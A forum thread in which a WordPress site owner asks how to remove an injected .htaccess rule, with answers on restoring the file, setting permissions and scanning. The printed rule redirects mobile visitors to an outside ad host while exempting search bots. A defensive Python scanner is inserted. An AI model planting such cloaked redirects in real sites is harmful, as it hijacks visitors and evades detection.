htaccess
nogames, 2014-05-23 15:37:38

How to remove malicious code from htaccess file?

Yandex.Webmaster reported that I have malicious code on my site that redirects users of the mobile version to the wrong place.
Here is what I found in the htaccess file:
php_value memory_limit 50M
#RewriteCond %{HTTP_HOST} !^mydomain\.ru$ [NC]
#RewriteRule ^(.*)$ mydomain.ru/$1 [R=301,L]
# BEGIN WordPress
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (adr|android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser| iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*)pda.whiteads.biz/?29&source=mydomain2.ru [L,R=302] # On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
*Replaced my site address with mydomain.
**mydomain2.ru is a mirror of my main domain, from which, in theory, there should be a forward to the main domain.
There was a similar question here (toster.ru/q/23715), and the topic starter was advised to check htaccess for constructs like the one I have.
I am not a programmer, so I do not understand what is needed in this code and what is malicious code. And yes, the last modified date of the file corresponds to the date when one polite and helpful freelancer made a new feature for the site for me. Therefore, I am now somewhat afraid to give strangers access to the site.
I hope for collective help. Thanks in advance to everyone who answers!


4 answer(s)
1001001 111, 2014-05-23
@IgorO2

Give me access, I'll fix it =)))
P.S. How to protect users of the mobile version of the site/forum from malicious banners/scripts?

Alexander Borisovich, 2014-05-23
@Alexufo

Take a normal htaccess from the distribution kit.
Then set the permissions on this file to the minimum, 600.
And ... look for the same files in all directories.
And it was also flooded, or doorway - the body of the virus.
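
Added example (not part of the thread and not taken from any tool named in it): a Python script for the "look for the same files in all directories" step, flagging RewriteRules that are gated on User-Agent or Referer and point at a host you do not own. The function names, the `own_hosts` parameter and the constructed sample with its placeholder host `ads.example.net` are assumptions made for illustration.

```python
import os
import re

# Conditions that key a rule on who the visitor is (browser or referring site).
VISITOR_COND = re.compile(r'RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}', re.I)
# Substitution that leaves the site: http://host, https://host or //host.
EXTERNAL = re.compile(r'(?:https?:)?//([^/?#:]+)', re.I)

def scan_htaccess(text, own_hosts=()):
    """Return [(line_no, line)] for visitor-gated rules targeting a foreign host."""
    own = {h.lower() for h in own_hosts}
    findings, gated = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith('#'):
            continue                      # commented-out directives are inert
        if VISITOR_COND.match(line):
            gated = True                  # applies to the next RewriteRule
        elif line.lower().startswith('rewriterule'):
            parts = line.split()
            target = EXTERNAL.match(parts[2]) if len(parts) > 2 else None
            if gated and target and target.group(1).lower() not in own:
                findings.append((no, line))
            gated = False                 # conditions are consumed by this rule
    return findings

def scan_tree(root, own_hosts=()):
    """Walk root and scan every .htaccess found in any directory."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if '.htaccess' in files:
            path = os.path.join(dirpath, '.htaccess')
            with open(path, encoding='utf-8', errors='replace') as fh:
                found = scan_htaccess(fh.read(), own_hosts)
            if found:
                hits[path] = found
    return hits

# Constructed sample modelled on the question; the redirect host is a placeholder.
SAMPLE = r"""RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|iphone|symbian) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|crawler|yandex|google) [NC]
RewriteRule (.*) http://ads.example.net/?src=mydomain.ru [L,R=302]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

print(scan_htaccess(SAMPLE, own_hosts=['mydomain.ru']))
```

Call `scan_tree` on the site root with your own domains in `own_hosts`; a redirect that is not conditional on the visitor is deliberately not reported, so a hit is a prompt to read the file, not a verdict.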

Illan, 2014-05-24
@Illan

It was discussed here, there is even an example:
For what reason can a virus enter the site (when you enter from a mobile phone)?

Viktor Taran, 2018-03-19
@shambler81

1. Leave it like this:

php_value memory_limit 50M
#RewriteCond %{HTTP_HOST} !^mydomain\.ru$ [NC]
#RewriteRule ^(.*)$ mydomain.ru/$1 [R=301,L]
# BEGIN WordPress

RewriteEngine on
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

2. Download here: https://revisium.com/ai/ (for websites)
3. Run it either via ssh (php -q ai-bolit.php) or in the browser, and wait. Then look through what it found and delete (thoughtfully).
It is advisable to update the engine (do not even think about it without a backup), and ideally to find the vulnerability.
